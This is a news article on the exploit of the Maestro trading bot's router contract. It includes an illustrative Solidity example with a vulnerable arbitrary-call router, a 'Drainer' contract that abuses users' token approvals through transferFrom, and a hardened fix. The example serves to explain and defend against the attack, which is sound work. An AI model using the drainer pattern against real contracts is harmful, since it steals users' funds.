In a recent security breach, attackers exploited the Telegram trading bot Maestro and stole more than 280 Ether (ETH), worth roughly $500,000 at the time.
Telegram trading bots are designed to streamline on-chain trading and farming, but some require users to hand their private keys to the bot, which raises obvious security concerns.
According to blockchain security firm Beosin, the breach stemmed from an external-call vulnerability in the Maestro Router 2 smart contract: the router would forward a call to a target address and function chosen by the caller.
Because users had approved the router to spend their tokens on their behalf, the router itself was an authorised spender on every token they had approved. Attackers therefore passed a token's address as the target, named "transferFrom" as the function, and supplied the victim's address and their own address as the parameters. The router then called transferFrom(victim, attacker, amount) on the token, and the token accepted the transfer because the call came from the router that held the victim's allowance.
“Attackers can pass in a token address, fill in the called function as transferfrom, with parameters as the victim’s address and their own address, so they can transfer the victim’s tokens to their own address through transferfrom.”
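To make the bug class concrete, the following Solidity is an added illustration written for this article; it is not Maestro's code, which the article does not reproduce, and every contract, function and address in it is hypothetical. It shows a router that forwards a caller-chosen target and calldata while holding users' ERC-20 approvals, the calldata an attacker would submit to it, and a hardened variant that never lets the caller pick the target and only ever pulls tokens from the transaction sender.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Minimal ERC-20 surface used below.
interface IERC20 {
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
    function allowance(address owner, address spender) external view returns (uint256);
    function balanceOf(address account) external view returns (uint256);
}

// Hypothetical router with the bug class Beosin describes: it forwards a
// caller-chosen target and calldata. Users approve this contract to spend
// their tokens so it can trade for them, which makes the router an
// authorised spender on every token they approved. Anyone can therefore make
// it call token.transferFrom(victim, attacker, amount), and the token accepts
// the call because msg.sender (the router) holds the victim's allowance.
contract VulnerableRouter {
    function execute(address target, bytes calldata data) external returns (bytes memory) {
        (bool ok, bytes memory ret) = target.call(data);
        require(ok, "call failed");
        return ret;
    }
}

// The attacker's transaction, written as a contract for clarity; an EOA could
// send the same calldata to execute() directly. No key of the victim is
// involved, only the approval the victim previously gave the router.
contract Drainer {
    function drain(VulnerableRouter router, IERC20 token, address victim) external {
        // Take whichever is smaller: what the victim holds or what the router may spend.
        uint256 amount = token.balanceOf(victim);
        uint256 allowed = token.allowance(victim, address(router));
        if (allowed < amount) amount = allowed;

        bytes memory data = abi.encodeWithSelector(
            IERC20.transferFrom.selector, victim, msg.sender, amount
        );
        router.execute(address(token), data);
    }
}

// Hardened variant. The caller never chooses the target: it must be on an
// owner-maintained allow-list of DEX contracts (never token contracts), and
// the only transferFrom the router issues names msg.sender as the source, so
// an approval can move only the approver's own tokens, and only in a
// transaction the approver signed.
contract HardenedRouter {
    address public immutable owner;
    mapping(address => bool) public allowedDex;

    constructor(address[] memory dexes) {
        owner = msg.sender;
        for (uint256 i = 0; i < dexes.length; i++) {
            allowedDex[dexes[i]] = true;
        }
    }

    function setDex(address dex, bool allowed) external {
        require(msg.sender == owner, "not owner");
        allowedDex[dex] = allowed;
    }

    function swap(IERC20 tokenIn, uint256 amountIn, address dex, bytes calldata swapData)
        external
        returns (bytes memory)
    {
        require(allowedDex[dex], "dex not allowed");
        // Pull from the caller only. Production code should use SafeERC20 so
        // that tokens which do not return a bool are handled.
        require(tokenIn.transferFrom(msg.sender, address(this), amountIn), "pull failed");
        (bool ok, bytes memory ret) = dex.call(swapData);
        require(ok, "swap failed");
        return ret;
    }
}
```

The fix is the allow-list together with binding the `from` argument to `msg.sender`; rejecting the `transferFrom` selector alone is not enough, because other allowance-consuming entry points (for example `burnFrom` on burnable tokens) reach the same approvals. On the user side the check after any router bug is the same: approvals granted to the old contract address stay valid until the user revokes them with `approve(router, 0)`.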
Another blockchain analysis firm, PeckShield, reported that an address flagged as a phishing wallet took 37 million JOE tokens in the exploit.
The sale of those tokens sent the price of JOE down by more than 30%, and Maestro was unable to buy back enough JOE to refund holders because of the lack of liquidity.
Following the attack, the attacker moved the stolen 280 ETH into Railgun, a crypto privacy protocol that obscures transaction details.
In response, the Maestro team quickly identified the exploit and patched it.
They replaced the router with a fixed implementation and trading resumed normally, although tokens traded on SushiSwap, ShibaSwap and Ethereum PancakeSwap pools were temporarily unavailable.
Maestro took responsibility for the incident and promptly refunded all affected users: the team bought back the lost tokens and sent them to the victims' wallets, so that every affected wallet received the full amount it had lost.
It is worth noting that in May 2023 Maestro's earnings reportedly exceeded $20 million, with the bot collecting as much as $5 million a month in commissions at its peak. Those profits come at a cost: users hand their private keys to the bot so that it can sign transactions on their behalf.
This contradicts the decentralised ethos of “not your keys, not your coins.”
In light of the Maestro attack, caution is advised when using such bots. As one Twitter user highlighted, “Maestro bot just got EXPLOITED 🚨 I never did trust all the stupid bots popping out left and right. Stay away from these bots. Be safe.”
However, the Maestro team stated that the exploit targeted the router contract rather than the bot's key storage, and that users' wallet credentials were not compromised. Note that ERC-20 approvals granted to a router contract persist until revoked, so anyone who had approved the affected router should review those allowances and revoke any they no longer need.